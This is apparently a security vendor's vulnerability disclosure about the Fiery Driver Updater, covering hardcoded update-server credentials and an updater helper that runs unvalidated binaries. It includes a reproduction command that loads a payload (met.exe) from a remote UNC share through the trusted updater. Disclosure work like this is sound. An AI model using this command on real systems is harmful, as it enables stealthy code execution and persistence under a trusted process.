<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=363521274148941&amp;ev=PageView&amp;noscript=1">
Emerging Threats

Bring Your Own Updates (BYOU): Abusing Fiery Driver Updaters for Stealthy Code Execution

Reegun Jayapaul
November 12 2025
Home / Howler Cell / Bring Your Own Updates (BYOU): Abusing Fiery Driver Updaters for Stealthy Code Execution

Summary/Title Text

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco.

Summary

Howler Cell continued its research on Bring Your Own Updates (BYOU). In a previous publication on abusing updater mechanisms in Advanced Installer, we highlighted how trusted update frameworks can be turned into post-exploitation tools.

Key Findings

  • Howler Cell discovered two major security risks in the Fiery Driver Updater v1.0.0.16, a tool utilized by major printer server companies, including Canon, Sharp, and Xerox.

  • The driver binary embeds credentials used to contact an external updater endpoint, though it's unclear whether that endpoint serves update binaries, analytics, or both.

  • If the endpoint hosts update binaries, those credentials could let an attacker retrieve or modify them, enabling a critical supply-chain attack. If it stores analytics, it could allow unauthorized access to customer data, creating privacy and operational risk.

  • Additionally, the updater accepts remote binaries over open UNC paths and can execute local, untrusted binaries without validating source or integrity — creating a path for arbitrary code execution and potential remote compromise through poisoned updates.

  • In either case, the vulnerabilities introduce a significant supply-chain risk that could allow attackers to abuse update mechanisms or data flows to compromise customers.

  • Howler Cell followed responsible disclosure and did not interact with the potentially exposed server.

Fiery, LLC and Its Customers 

Fiery, LLC is a well-known provider of digital front ends (DFEs), workflow solutions, and professional services for the industrial and graphic arts print industries. According to Enlyft, over 2 million Fiery DFEs have been sold globally. The majority of customers are based in the United States (73%), followed by the United Kingdom (8%) and Canada (6%).

Major Fiery digital print server customers, as advertised on their website, shown below in Figure 1. Some of the largest printer companies in the world, such as Canon, Sharp, and Xerox, are shown to work with Fiery.

Figure 1 Sample Fiery Customers


In addition, online research indicates that this list is not comprehensive. For example, Hewlett-Packard's website claims they use Fiery for their printer digital front ends, shown in Figure 2.

Figure 2 Hewlett-Packard's Fiery Usage


We cannot verify if these companies used a vulnerable version of the Fiery Driver, but if an organization uses a printer in its environment, then a certain level of risk should be reviewed.

What's the Impact?

The issue enables arbitrary code execution by accepting remote binaries over open UNC paths or executing local, untrusted binaries without validating source or integrity. The use of hardcoded credentials leads to potential supply chain attack risk.

  • If EfiUpdateHelper.exe or similar updaters are whitelisted or excluded by security tools, attackers can run code without triggering alerts.

  • Attackers can maintain persistence or escalate privileges depending on how and where the updater runs.

  • This is a post-exploitation vector, not an initial access method, and is useful to insiders or attackers with limited access who need a legitimate execution path.

  • The binary contains plaintext, hardcoded credentials that allow direct access to the updater endpoint.

  • Anyone with access to the binary can extract those credentials.

  • If the endpoint hosts updater binaries and server protections are weak, an attacker could retrieve, modify, or replace the updater binary.

  • If the endpoint holds analytics, attackers could also collect customer analytics, creating privacy and operational risk.

  • A developer who embedded credentials may retain a backdoor to the update mechanism after leaving the organization.

  • Unauthorized changes could be pushed to end users through the trusted update channel, creating a broad supply chain risk.

Technical Analysis 

Howler Cell identified a critical security issue in EfiUpdateHelper.exe, bundled with Fiery Driver Updater version 1.0.0.16.

Unauthenticated Update Requests 

The EfiUpdateHelper.exe binary can be exploited through its update syntax:

EfiUpdateHelper.exe -update <PID> <SOURCE_FILE> <DEST_FILE>

An attacker can supply a malicious binary as the <SOURCE_FILE> from a remote UNC path or local directory. Since the binary does not validate the source or integrity of the file, it will copy the attacker-controlled payload to the <DEST_FILE> location and potentially execute it in the context of a trusted process in the target process ID <PID>. This makes it a reliable method for running arbitrary code during post-compromise.

Steps to Reproduce - Binary Exploitation

EfiUpdateHelper.exe -update 2728 \\\\192.168.191.137\\offsec\\met.exe "Fiery Driver Updater.exe"

  • The above command demonstrates that a remote UNC path (\\\\192.168.191.137\\offsec\\met.exe) can be supplied as the source file; you can also refer to a local binary.
  • The binary does not verify whether the file comes from a trusted origin, nor does it validate signatures or perform integrity checks.
  • This allows arbitrary execution of attacker-controlled payloads with the privileges of the update process.

Hardcoded Plain Text Credentials

The vulnerability lies in how the Fiery Driver Updater.exe binary handles authentication.

During analysis, we extracted readable strings from the binary and found a hardcoded HTTP Basic Authentication header that began with the prefix Basic ZHJ.... This value was Base64-encoded, as shown in Figure 3.

When decoded, it revealed plaintext credentials used to authenticate with the update server, either for retrieving updates or submitting analytics. These credentials are embedded directly in the binary, making them easily accessible to anyone with access to the file.

This presents a potential supply chain risk. An attacker could use the credentials to retrieve the updater binary, and if they can identify where it is hosted, possibly replace it. They could also use the credentials to access customer analytics data.

Figure 3 Hardcoded HTTP Basic Authentication


Proof of Concept

 


Responsible Disclosure From Cyderes

We responsibly disclosed this issue to Fiery, LLC. Their team responded promptly and shared that this driver is a discontinued version of the product.

We have observed that a Fiery product is still connecting and downloading this updater from https://d1umxs9ckzarso.cloudfront.net/Products/FieryDriver/FD51/ProductMaster/ProductMaster.xml, and it is still active (as of time of publication).

Back to Top
Be Ready

Stay informed with Howler Cell

Receive the latest Howler Cell news and research directly to your inbox. 

Optional featured resource text

Howler Cell has been tracking and investigating the new variant of MedusaLocker. MedusaLocker is a well-known ransomware family active since late 2019

Learn More

Ready to close your security gaps?

To stay ahead of today’s relentless threatscape, you’ve got to close the gap between security strategy and execution. Cyderes helps you act fast, stay focused, and move your business forward. 

GET IN TOUCH